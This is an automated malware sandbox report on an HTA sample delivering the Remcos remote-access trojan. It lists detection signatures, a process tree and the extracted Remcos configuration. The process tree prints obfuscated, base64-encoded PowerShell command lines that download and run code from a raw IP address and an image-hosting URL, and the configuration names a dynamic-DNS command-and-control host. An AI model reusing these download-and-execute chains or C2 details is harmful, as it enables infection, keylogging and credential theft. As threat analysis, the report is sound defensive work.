Edit tour
Windows
Analysis Report
nicegirlforyou.hta
Overview
General Information
Detection
Cobalt Strike, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 3512 cmdline:
mshta.exe "C:\Users\ user\Deskt op\nicegir lforyou.ht a" MD5: 06B02D5C097C7DB1F109749C45F3F505) - cmd.exe (PID: 1436 cmdline:
"C:\Window s\system32 \cmd.exe" "/c poweRS HELl.EXe -Ex ByPAs s -n OP - W 1 -c DeVIc EcrEDeNtIA ldEPLoYMEN t.ExE ; InVoke-ExP ReSsIon($( InVoKE-Exp RESsIoN('[ SYstEm.teX T.eNCOding ]'+[cHAr]0 x3A+[CHar] 0x3a+'Utf8 .GEtstRinG ([SYstEM.c onvERT]'+[ cHAR]0x3a+ [cHAR]0x3A +'frOmbasE 64STRing(' +[CHAr]34+ 'JE5ZeFFkN GxBICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgID0 gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgQUREL XRZUGUgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLU1FbWJFc mRlRkluaVR JT04gICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgJ 1tEbGxJbXB vcnQoInVST G1PbiIsICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIENoYXJTZ XQgPSBDaGF yU2V0LlVua WNvZGUpXXB 1YmxpYyBzd GF0aWMgZXh 0ZXJuIElud FB0ciBVUkx Eb3dubG9hZ FRvRmlsZSh JbnRQdHIgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgS3lRQW1 WSklRb0csc 3RyaW5nICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIGJqLHN0c mluZyAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB RbSx1aW50I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgIElyR2R wSHZTTWwsS W50UHRyICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIEZMTnpVb mZMRyk7JyA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAtTmFNZ SAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAienZ qIiAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAtT mFtRXNwYWN FICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIGIgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLVBhc3N UaHJ1OyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAkTll4UWQ 0bEE6OlVST ERvd25sb2F kVG9GaWxlK DAsImh0dHA 6Ly8xNzIuM jQ1LjE0Mi4 2MC81NTEvc 2hlaXNteWd pcmx3aG9sb 3ZlZG1lYWx vdHN0aWxsY Wxzb3NoZWx vdmVzbWV0c nVseWZyb21 0aGVoZWFyd C50SUYiLCI kRU52OkFQU ERBVEFcc2h laXNteWdpc mx3aG9sb3Z lZG1lYWxvd HN0aWxsYWx zb3NoZWxvd mVzbWV0cnV seS52YnMiL DAsMCk7U1R hUnQtc0xlZ XAoMyk7aW5 WT0tFLWV4c FJlU3NJb04 gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIiRlT nY6QVBQREF UQVxzaGVpc 215Z2lybHd ob2xvdmVkb WVhbG90c3R pbGxhbHNvc 2hlbG92ZXN tZXRydWx5L nZicyI='+[ CHar]0X22+ '))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3992 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4824 cmdline:
poweRSHELl .EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcr EDeNtIAldE PLoYMENt.E xE ; InV oke-ExPReS sIon($(InV oKE-ExpRES sIoN('[SYs tEm.teXT.e NCOding]'+ [cHAr]0x3A +[CHar]0x3 a+'Utf8.GE tstRinG([S YstEM.conv ERT]'+[cHA R]0x3a+[cH AR]0x3A+'f rOmbasE64S TRing('+[C HAr]34+'JE 5ZeFFkNGxB ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgID0gIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgQURELXRZ UGUgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLU 1FbWJFcmRl RkluaVRJT0 4gICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgJ1tE bGxJbXBvcn QoInVSTG1P biIsICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIE NoYXJTZXQg PSBDaGFyU2 V0LlVuaWNv ZGUpXXB1Ym xpYyBzdGF0 aWMgZXh0ZX JuIEludFB0 ciBVUkxEb3 dubG9hZFRv RmlsZShJbn RQdHIgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg S3lRQW1WSk lRb0csc3Ry aW5nICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIG JqLHN0cmlu ZyAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICBRbS x1aW50ICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IElyR2RwSH ZTTWwsSW50 UHRyICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIE ZMTnpVbmZM Ryk7JyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AtTmFNZSAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAienZqIi AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtTmFt RXNwYWNFIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIGIgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg LVBhc3NUaH J1OyAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAk Tll4UWQ0bE E6OlVSTERv d25sb2FkVG 9GaWxlKDAs Imh0dHA6Ly 8xNzIuMjQ1 LjE0Mi42MC 81NTEvc2hl aXNteWdpcm x3aG9sb3Zl ZG1lYWxvdH N0aWxsYWxz b3NoZWxvdm VzbWV0cnVs eWZyb210aG VoZWFydC50 SUYiLCIkRU 52OkFQUERB VEFcc2hlaX NteWdpcmx3 aG9sb3ZlZG 1lYWxvdHN0 aWxsYWxzb3 NoZWxvdmVz bWV0cnVseS 52YnMiLDAs MCk7U1RhUn Qtc0xlZXAo Myk7aW5WT0 tFLWV4cFJl U3NJb04gIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgIiRlTnY6 QVBQREFUQV xzaGVpc215 Z2lybHdob2 xvdmVkbWVh bG90c3RpbG xhbHNvc2hl bG92ZXNtZX RydWx5LnZi cyI='+[CHa r]0X22+')) ')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 5092 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\gxlowwdn \gxlowwdn. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 6784 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE SFAE8.tmp" "c:\Users \user\AppD ata\Local\ Temp\gxlow wdn\CSC564 36D3591594 02F8D448B1 2D32335C6. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - wscript.exe (PID: 1776 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\sheis mygirlwhol ovedmealot stillalsos helovesmet ruly.vbs" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 2704 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $portioned = 'JHByZW 9idGFpbnMg PSAnaHR0cH M6Ly9yZXMu Y2xvdWRpbm FyeS5jb20v ZHl0Zmx0Nj FuL2ltYWdl L3VwbG9hZC 92MTczMzEz NDk0Ny9ia2 xweXNleWV1 dDRpbXB3NT BuMS5qcGcg JzskbGFsbH lnYWdnaW5n ID0gTmV3LU 9iamVjdCBT eXN0ZW0uTm V0LldlYkNs aWVudDskdG F1bnRpbmds eSA9ICRsYW xseWdhZ2dp bmcuRG93bm xvYWREYXRh KCRwcmVvYn RhaW5zKTsk bm9udmlyZ2 lucyA9IFtT eXN0ZW0uVG V4dC5FbmNv ZGluZ106Ol VURjguR2V0 U3RyaW5nKC R0YXVudGlu Z2x5KTskbm V3c21lbiA9 ICc8PEJBU0 U2NF9TVEFS VD4+Jzskc3 Bpcml0dWFs aXN0aWMgPS AnPDxCQVNF NjRfRU5EPj 4nOyRhc2Fm b2V0aWRhcy A9ICRub252 aXJnaW5zLk luZGV4T2Yo JG5ld3NtZW 4pOyRzbm9v emUgPSAkbm 9udmlyZ2lu cy5JbmRleE 9mKCRzcGly aXR1YWxpc3 RpYyk7JGFz YWZvZXRpZG FzIC1nZSAw IC1hbmQgJH Nub296ZSAt Z3QgJGFzYW ZvZXRpZGFz OyRhc2Fmb2 V0aWRhcyAr PSAkbmV3c2 1lbi5MZW5n dGg7JG95ZX MgPSAkc25v b3plIC0gJG FzYWZvZXRp ZGFzOyRzdG lsbGluZyA9 ICRub252aX JnaW5zLlN1 YnN0cmluZy gkYXNhZm9l dGlkYXMsIC RveWVzKTsk aG9sbG93bm Vzc2VzID0g LWpvaW4gKC RzdGlsbGlu Zy5Ub0NoYX JBcnJheSgp IHwgRm9yRW FjaC1PYmpl Y3QgeyAkXy B9KVstMS4u LSgkc3RpbG xpbmcuTGVu Z3RoKV07JG NvbGVzbGF3 cyA9IFtTeX N0ZW0uQ29u dmVydF06Ok Zyb21CYXNl NjRTdHJpbm coJGhvbGxv d25lc3Nlcy k7JG1hbmFn ZW1lbnRzID 0gW1N5c3Rl bS5SZWZsZW N0aW9uLkFz c2VtYmx5XT o6TG9hZCgk Y29sZXNsYX dzKTskamV3 ZmlzaCA9IF tkbmxpYi5J Ty5Ib21lXS 5HZXRNZXRo b2QoJ1ZBSS cpOyRqZXdm aXNoLkludm 9rZSgkbnVs bCwgQCgnMC 9uQ3gzMC9y L2VlLmV0c2 FwLy86c3B0 dGgnLCAnJG ZvcmViZWFy JywgJyRmb3 JlYmVhcics ICckZm9yZW JlYXInLCAn Q2FzUG9sJy wgJyRmb3Jl YmVhcicsIC ckZm9yZWJl YXInLCckZm 9yZWJlYXIn LCckZm9yZW JlYXInLCck Zm9yZWJlYX InLCckZm9y ZWJlYXInLC ckZm9yZWJl YXInLCcxJy wnJGZvcmVi ZWFyJykpOw ==';$repro vals = [Sy stem.Text. Encoding]: :UTF8.GetS tring([Sys tem.Conver t]::FromBa se64String ($portione d));Invoke -Expressio n $reprova ls MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 3516 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - CasPol.exe (PID: 6860 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": ["rmcnewprojectadd.duckdns.org:14645:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-QEQMVZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 16 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 7 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |